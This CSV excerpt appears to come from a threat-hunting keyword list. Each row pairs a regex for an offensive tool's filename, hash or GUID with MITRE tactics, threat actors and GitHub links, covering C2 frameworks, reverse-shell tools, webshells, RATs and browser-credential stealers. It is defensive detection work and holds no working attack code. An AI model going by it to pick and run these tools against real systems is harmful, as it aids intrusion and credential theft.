"*ACTIVEREMOTESHELL*",".{0,1000}ACTIVEREMOTESHELL.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33178"
"*activeScan++.py*",".{0,1000}activeScan\+\+\.py.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","network exploitation tool","7","7","630","195","2025-04-17T10:47:54Z","2014-06-23T10:04:13Z","33179"
"*AD LDAP Command Line Searching that doesn't suck.*",".{0,1000}AD\sLDAP\sCommand\sLine\sSearching\sthat\sdoesn\'t\ssuck\..{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","33180"
"*AD Privesc Automation*",".{0,1000}AD\sPrivesc\sAutomation.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","33181"
"*ad_dns_dump.txt*",".{0,1000}ad_dns_dump\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","33182"
"*AD_Enumeration_Hunt.ps1*",".{0,1000}AD_Enumeration_Hunt\.ps1.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","AD Enumeration","7","1","93","18","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z","33183"
"*AD_Enumeration_Hunt-alperen_ugurlu_hack*",".{0,1000}AD_Enumeration_Hunt\-alperen_ugurlu_hack.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","AD Enumeration","7","1","93","18","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z","33184"
"*ad_miner.sources.modules.*",".{0,1000}ad_miner\.sources\.modules\..{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","33185"
"*AD_Miner-main*",".{0,1000}AD_Miner\-main.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","33186"
"*AD0067D9-4AF6-47C2-B0C3-D768A9624002*",".{0,1000}AD0067D9\-4AF6\-47C2\-B0C3\-D768A9624002.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","33187"
"*ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766*",".{0,1000}ad042ec9afbf29b4b962820a1e82f4d1d6a8c654c42f3c55d6e562dc7a279766.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","33188"
"*ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798*",".{0,1000}ad1117e7a6d3284f9ddc7f8ec841f72b759932d1467cffd9633af242f8f00798.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33190"
"*ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347*",".{0,1000}ad12dd2d23a3fdaa017293fe0acb1d6b60503d86c05b7b4e94e93df8beb1a347.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33191"
"*ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd*",".{0,1000}ad1e96ef3defc771763f6f6475dc020d543b9712d067aa63ab95ad56a934c5fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33194"
"*ad1fdf36f0f9507ddfe59e2dcab4ee246be5c9ddfb674107bf313c21655d4b0c*",".{0,1000}ad1fdf36f0f9507ddfe59e2dcab4ee246be5c9ddfb674107bf313c21655d4b0c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33195"
"*ad23cc7c081e18f568ba1aef36bf1002d296bee1cb3ccec0958f328cf97dbe27*",".{0,1000}ad23cc7c081e18f568ba1aef36bf1002d296bee1cb3ccec0958f328cf97dbe27.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33196"
"*AD240C26-717F-4937-A4CD-5827BDC315E6*",".{0,1000}AD240C26\-717F\-4937\-A4CD\-5827BDC315E6.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","33197"
"*ad32bf0a043b3ec5c05f0a10ad724113bffa7a2871bac8defe8538322a2129f9*",".{0,1000}ad32bf0a043b3ec5c05f0a10ad724113bffa7a2871bac8defe8538322a2129f9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33199"
"*ad32cb154c001fea9cedc23a2773ab62bc4d43491aea1060454713e396af5582*",".{0,1000}ad32cb154c001fea9cedc23a2773ab62bc4d43491aea1060454713e396af5582.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33200"
"*ad393f135cc101f7897812ad3183775a89853e89cab5f31ae89eef3240ca9c4f*",".{0,1000}ad393f135cc101f7897812ad3183775a89853e89cab5f31ae89eef3240ca9c4f.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#filehash","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","33201"
"*ad3d435b6a93f157946e1e33b7f9e0beff6deffcba00a182a17386ef42f1d7e7*",".{0,1000}ad3d435b6a93f157946e1e33b7f9e0beff6deffcba00a182a17386ef42f1d7e7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33203"
"*AD495F95-007A-4DC1-9481-0689CA0547D9*",".{0,1000}AD495F95\-007A\-4DC1\-9481\-0689CA0547D9.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","#GUIDproject","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","33204"
"*ad50106f03dc12f69b15eab5dd76a917b4200f3d02e7f25929d6194a5da965fb*",".{0,1000}ad50106f03dc12f69b15eab5dd76a917b4200f3d02e7f25929d6194a5da965fb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33206"
"*ad50d7d93bf5ae78bc0115093854d68da5256942bdf2169f8832eb72ff3d8b74*",".{0,1000}ad50d7d93bf5ae78bc0115093854d68da5256942bdf2169f8832eb72ff3d8b74.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33207"
"*ad577ef615bc0658fcb17bbb64afc2b7a3f487cd1eb7c2b673357d1df622fa78*",".{0,1000}ad577ef615bc0658fcb17bbb64afc2b7a3f487cd1eb7c2b673357d1df622fa78.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33208"
"*ad58073b97609066a7a55c5b880a23f0986e49e36588ecc68a4f62c29d03b1b1*",".{0,1000}ad58073b97609066a7a55c5b880a23f0986e49e36588ecc68a4f62c29d03b1b1.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","33209"
"*ad5c08c647f8042f9d4a29581f2c740bb0634404f140cb585ad8175376adaa64*",".{0,1000}ad5c08c647f8042f9d4a29581f2c740bb0634404f140cb585ad8175376adaa64.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","33210"
"*ad690f3c67428e406d7e39e38b1e7c0569eaec1cd488a3f81c49048e9758cdf6*",".{0,1000}ad690f3c67428e406d7e39e38b1e7c0569eaec1cd488a3f81c49048e9758cdf6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33214"
"*ad6e6b33e48ec8da3e59868731d700938add9cbe26687e1555028a04233a4f43*",".{0,1000}ad6e6b33e48ec8da3e59868731d700938add9cbe26687e1555028a04233a4f43.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33215"
"*ad710c24d6097ad20bf1bbda621f02d5b7410730ab4b08395cee96276f5f8bf7*",".{0,1000}ad710c24d6097ad20bf1bbda621f02d5b7410730ab4b08395cee96276f5f8bf7.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","33216"
"*ad7136daff93312ebb41fe388da46d2814ab6504e23b3c90b2a56a0426a558e3*",".{0,1000}ad7136daff93312ebb41fe388da46d2814ab6504e23b3c90b2a56a0426a558e3.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","33217"
"*ad76055ffa760f3aac8cf5dca9e2380246abb919484b28ed8d5c2ca1a6066e31*",".{0,1000}ad76055ffa760f3aac8cf5dca9e2380246abb919484b28ed8d5c2ca1a6066e31.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33218"
"*ad7e24d0f08fbea59de51b1b3e0212dbe394572856b833bffaa215f9abb7bb96*",".{0,1000}ad7e24d0f08fbea59de51b1b3e0212dbe394572856b833bffaa215f9abb7bb96.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33219"
"*ad86a839998173ce0349e06fcf1afe4c494490d071d10a3486671b03f0846485*",".{0,1000}ad86a839998173ce0349e06fcf1afe4c494490d071d10a3486671b03f0846485.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33220"
"*ad89fdf30b1ffef5cdf285079f018969976d37a143e19bce810c6b234a8f58c0*",".{0,1000}ad89fdf30b1ffef5cdf285079f018969976d37a143e19bce810c6b234a8f58c0.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","33221"
"*ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546*",".{0,1000}ad8aa2a15aa507d1d9231c4c5ebaa93501fe32c56d287e83c8f7197d4e15b546.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","33222"
"*ad8f8790854a70fc8a3f5d53931d0e56a2ff0f037cf781fccfabcb4334d817be*",".{0,1000}ad8f8790854a70fc8a3f5d53931d0e56a2ff0f037cf781fccfabcb4334d817be.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","33223"
"*ad94977a2d07c55c4b2106b47bd640ebc9ed21c8883a69a998604a4b4109288b*",".{0,1000}ad94977a2d07c55c4b2106b47bd640ebc9ed21c8883a69a998604a4b4109288b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33225"
"*ad953b6731c27ada2c6c7dfd14aca6f46218b962db4272a5c042e4259dacb2e3*",".{0,1000}ad953b6731c27ada2c6c7dfd14aca6f46218b962db4272a5c042e4259dacb2e3.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","33226"
"*ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07*",".{0,1000}ad97557e81bf680c9c796b2673a34562a0f80cb27b88bf53fe20a9a281723e07.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","33227"
"*ad9d0bd619aae9231977ed9b002981bf272afb9a93d198406296a7b4f7d28542*",".{0,1000}ad9d0bd619aae9231977ed9b002981bf272afb9a93d198406296a7b4f7d28542.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","33229"
"*AD9F3A60-C492-4823-8F24-6F4854E7CBF5*",".{0,1000}AD9F3A60\-C492\-4823\-8F24\-6F4854E7CBF5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#GUIDproject","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33230"
"*ADACLScan.ps1*",".{0,1000}ADACLScan\.ps1.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","33231"
"*ADACLScanner*",".{0,1000}ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","33232"
"*ADACLScanner-master*",".{0,1000}ADACLScanner\-master.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","33233"
"*adalanche analyze*",".{0,1000}adalanche\sanalyze.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33234"
"*adalanche collect*",".{0,1000}adalanche\scollect.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33235"
"*adalanche-*.exe*",".{0,1000}adalanche\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33236"
"*Adalanche.git*",".{0,1000}Adalanche\.git.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33237"
"*adalanche-collector*",".{0,1000}adalanche\-collector.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33238"
"*Adamantium-Thief-master*",".{0,1000}Adamantium\-Thief\-master.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","33239"
"*adaptivethreat/Empire*",".{0,1000}adaptivethreat\/Empire.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","33240"
"*AdaptixClient/AdaptixClient*",".{0,1000}AdaptixClient\/AdaptixClient.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","33241"
